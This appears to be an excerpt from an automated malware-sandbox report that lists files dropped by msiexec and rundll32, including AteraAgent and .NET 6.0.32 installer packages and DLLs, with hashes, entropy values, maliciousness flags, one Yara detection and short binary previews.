                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\434f871c532673e1359654ad68a1c225\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\a
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):651
                                                                                                                                                                                                                                        Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                        MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                        SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                        SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                        SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878684894941199
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:z+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:z+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                        MD5:50159E0E7ACFD900E3190F860297D1E6
                                                                                                                                                                                                                                        SHA1:D4F6302266269F2BDDFAAA96625DD3D391E11E25
                                                                                                                                                                                                                                        SHA-256:9104930A661AF5E641AD911FC30C0887433713EA589E389F06CBD5BB0A7ED5AD
                                                                                                                                                                                                                                        SHA-512:BDD424B5DDADAE02A8A4D16CF67268613544A313C0E33F213B5BA2CF7130504596B9F2092B7C7A6660DA7DF54F779A8C2B472E243777DB5DC34E35EB732A9488
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878684894941199
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:z+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:z+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                        MD5:50159E0E7ACFD900E3190F860297D1E6
                                                                                                                                                                                                                                        SHA1:D4F6302266269F2BDDFAAA96625DD3D391E11E25
                                                                                                                                                                                                                                        SHA-256:9104930A661AF5E641AD911FC30C0887433713EA589E389F06CBD5BB0A7ED5AD
                                                                                                                                                                                                                                        SHA-512:BDD424B5DDADAE02A8A4D16CF67268613544A313C0E33F213B5BA2CF7130504596B9F2092B7C7A6660DA7DF54F779A8C2B472E243777DB5DC34E35EB732A9488
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                        MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                        SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                        SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                        SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Runtime - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Runtime - 6.0.32 (x64)., Template: x64;1033, Revision Number: {81A6B662-3AB0-42DC-AE22-74E8036F80FA}, Create Time/Date: Sun Jun 16 06:00:54 2024, Last Saved Time/Date: Sun Jun 16 06:00:54 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27222016
                                                                                                                                                                                                                                        Entropy (8bit):7.99350983480325
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:786432:xUjjZm/yN+5DsfeR/WZGvLF3bApyMYhKj:xS4/yN+NsG/WZQF3EpJYhK
                                                                                                                                                                                                                                        MD5:4E9EB394F40E78755FA76E67F9190CD0
                                                                                                                                                                                                                                        SHA1:36310C7F007992D911E8402E4AA34A2BB1682063
                                                                                                                                                                                                                                        SHA-256:8701E309396C5232A4FE1606C6E3549134FE01DC0D9FE4A74CB9D26531DDD9A4
                                                                                                                                                                                                                                        SHA-512:2CB71F44E7BBA16143120512718DD128185A5063BA4767146D10C93B81B6CAA4226CFC30FA44B1E50EE41C37B55852E32EA63554FD438FB9ED60DE2CE93CA8E3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host FX Resolver - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host FX Resolver - 6.0.32 (x64)., Template: x64;1033, Revision Number: {43DA5864-E85C-44A5-B8EC-4BB554FA8AFC}, Create Time/Date: Sun Jun 16 06:00:06 2024, Last Saved Time/Date: Sun Jun 16 06:00:06 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):876544
                                                                                                                                                                                                                                        Entropy (8bit):6.767183882536547
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:219IeVsJxYRR3cqU8VKIvZUlkj/cBhZeK4lu/XdmYwh:2jIxCMHWvZgkjcDefMFmL
                                                                                                                                                                                                                                        MD5:46DB6C104F1B633927DEE575B5C38C0B
                                                                                                                                                                                                                                        SHA1:9D5E6CF836E28959181B855102E70F5A37550314
                                                                                                                                                                                                                                        SHA-256:2C8DFB556F4A6576205AF03F8D5E2F0A939395CA2DE6D69F06478B3008D1A2CE
                                                                                                                                                                                                                                        SHA-512:007877E08B1958FDC5FEC7DA9FE8AD1A678C2E59BF0B5F4B4080640C1FAB96A34F27AF81F5A733580E95B897D0E27E1C1FD45A4CA20A673A20F3331F3D5C2B62
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host - 6.0.32 (x64)., Template: x64;1033, Revision Number: {6CC46603-A43D-40BF-9045-9949A2B95632}, Create Time/Date: Sun Jun 16 05:59:54 2024, Last Saved Time/Date: Sun Jun 16 05:59:54 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):811008
                                                                                                                                                                                                                                        Entropy (8bit):6.573482407139199
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:7hdTmeBQqU8VKIvZUlkj/cBhZeK4lu/XdmYwc:SQQHWvZgkjcDefMFm+
                                                                                                                                                                                                                                        MD5:AC53C5D5E2F1E2CCFD83408856CE81DB
                                                                                                                                                                                                                                        SHA1:14F67D98612AAD86C092DD05200B21A4FDFB8E1C
                                                                                                                                                                                                                                        SHA-256:756C0D73225DA2A0DA97C879E00F6D5B273A0078D0BAB55EB52755B449D1A896
                                                                                                                                                                                                                                        SHA-512:0FAB821D87FD7DAAB480DB7BF54F0A51A73A16E91440D7EA440A56F6BB3D177105BF1E0741F7D4B94D206F6152104F7B35456AE1F1054B6F679FF0A126588454
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Host - 6.0.32 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Host - 6.0.32 (x64)., Template: x64;1033, Revision Number: {6CC46603-A43D-40BF-9045-9949A2B95632}, Create Time/Date: Sun Jun 16 05:59:54 2024, Last Saved Time/Date: Sun Jun 16 05:59:54 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):811008
                                                                                                                                                                                                                                        Entropy (8bit):6.573482407139199
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:7hdTmeBQqU8VKIvZUlkj/cBhZeK4lu/XdmYwc:SQQHWvZgkjcDefMFm+
                                                                                                                                                                                                                                        MD5:AC53C5D5E2F1E2CCFD83408856CE81DB
                                                                                                                                                                                                                                        SHA1:14F67D98612AAD86C092DD05200B21A4FDFB8E1C
                                                                                                                                                                                                                                        SHA-256:756C0D73225DA2A0DA97C879E00F6D5B273A0078D0BAB55EB52755B449D1A896
                                                                                                                                                                                                                                        SHA-512:0FAB821D87FD7DAAB480DB7BF54F0A51A73A16E91440D7EA440A56F6BB3D177105BF1E0741F7D4B94D206F6152104F7B35456AE1F1054B6F679FF0A126588454
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):437217
                                                                                                                                                                                                                                        Entropy (8bit):6.647821387664616
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Et3jOZy2KsGU6a4Kspt3jOZy2KsGU6a4Ks2:0zOE2Z34K+zOE2Z34Kz
                                                                                                                                                                                                                                        MD5:BB58915DFAC275346D2F7FABE7B96392
                                                                                                                                                                                                                                        SHA1:9855D7D6ED94B396F3357590B16AAD4215150FF2
                                                                                                                                                                                                                                        SHA-256:7CA12CFA96B9CD8E25A947D592FA584E5FD096B753D51FEF322D2AF0AE0810A8
                                                                                                                                                                                                                                        SHA-512:18DAE9F6EDED1C4DB3B2E29F0E90ECF9D36B799358348AF5B4D9093FCC834D0B1E5A8C92E292A7027783C717377A0DB889F08525A15EDFE1B1AC74B2F0574F6A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI1C9.tmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@iOBY.@.....@.....@.....@.....@.....@......&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}..AteraAgent..ateraAgentSetup64_1_8_7_2.msi.@.....@.....@.....@........&.{911E9E2F-B38D-4D02-A148-5E49FC9D8943}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[....
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):84904
                                                                                                                                                                                                                                        Entropy (8bit):5.647792800664189
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:NW7nUIYEPaPQ1rAEIeJU8Zg65Q+fUQxs+RQdBKvlH0Vjqgg1bcdv4Yu8EB5vv49P:M7BQG+u1E
                                                                                                                                                                                                                                        MD5:1132B3050D7D700099E820D0F45F3817
                                                                                                                                                                                                                                        SHA1:E383BD62D69A798997AD0C4822415C8E62AFA50E
                                                                                                                                                                                                                                        SHA-256:A4A9FF70B5AD3559251A22BEC3716F18223C59787CCC833D9EC743F263AB431F
                                                                                                                                                                                                                                        SHA-512:5295DCCD48C060E4857B8DE3614CD2C95A40CE09FBFB0168481FD3B86652149C0A5BB8EA9CAFE1A1B413DC829F277B01C274B7AE87A6C83DCB5BF22C7364C12D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@oOBY.@.....@.....@.....@.....@.....@......&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}%.Microsoft .NET Runtime - 6.0.32 (x64)!.dotnet-runtime-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{81A6B662-3AB0-42DC-AE22-74E8036F80FA}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3B053811-15BE-513E-9DEC-B2B5C4918267}S.02:\Software\Classes\Installer\Dependencies\dotnet_runtime_48.128.16743_x64\Version.@.......@.....@.....@......&.{12C6BE75-4A6B-5D0E-8906-981484BEDEFB}D.C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\.version.@.......@.....@.....@......&.{5B8B7A30-DD32-5F3F-BF38-4CDA80FF7B58}^.C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-1-0.dll.@.......@.....@.....@......&.{2D57BD37-A665-5E90-A9
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2805
                                                                                                                                                                                                                                        Entropy (8bit):5.7668897285328855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:tILbin8264hpnUHMb6P3hvKhG1kaCbD8SuhM4DdeU1DWn1hXyDZkeEVlttyXcXo:tILbnfOaHPU4yFY/pe6SmDZkeEPk
                                                                                                                                                                                                                                        MD5:28C27AE3B5C3902FDB35A77EB5A39755
                                                                                                                                                                                                                                        SHA1:0699D726BEC3EDBDC65551EB653950D81348EE3B
                                                                                                                                                                                                                                        SHA-256:C468C80530C0EA7041C3A0F24E430E18BB99FA0AEB4A16A293237C35DB935F12
                                                                                                                                                                                                                                        SHA-512:652D531EED9D6C6A72F04E97844857D99DB63481E854DB7AEDBAE79AB1511E97DFA8CF4D34F8582771B47543692D78EF3A9E7CE47B4F51401098FE3F17877116
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@vOBY.@.....@.....@.....@.....@.....@......&.{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}..Microsoft .NET Host FX Resolver - 6.0.32 (x64)!.dotnet-hostfxr-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{43DA5864-E85C-44A5-B8EC-4BB554FA8AFC}.....@.....@.....@.....@.......@.....@.....@.......@......Microsoft .NET Host FX Resolver - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E116E585-E2CE-5BAC-A645-7047860785B2}W.02:\Software\Classes\Installer\Dependencies\Dotnet_CLI_HostFxr_48.128.16743_x64\Version.@.......@.....@.....@......&.{0AC899A6-3CC6-559F-9577-67925851F466}3.C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dll.@.......@.....@.....@......&.{8EC524B8-7864-5ACE-B320-2D36216EBC12}?.02:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\hostfxr\Version.@.......@.....@.....@........InstallFiles..Copying new files&.File: [1], Dir
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4254
                                                                                                                                                                                                                                        Entropy (8bit):5.705012664875961
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:JLTpblU3gtEVPQHLxo2qmao3t+G3uce62bDDkrQEPtjA:VnUweUmiBL3uce6BkW2
                                                                                                                                                                                                                                        MD5:AB3F80C1EA8B65C0B0EC774E104D6A1C
                                                                                                                                                                                                                                        SHA1:8102579C4F215C378D53520AB1B9066BAD2FE809
                                                                                                                                                                                                                                        SHA-256:7F72CFB6981947906691169B02A7A28EA295CC698B89DC957F532AA6844F46C9
                                                                                                                                                                                                                                        SHA-512:528424B0F0CA7E807C8406AD2BC05CB7EABB75EB1A003B4D89B87D2C74B72620521F767D41354BB6B3FCD6A9EDBD53BA71A19376427EE091B9DBB2D15CBBEEAE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
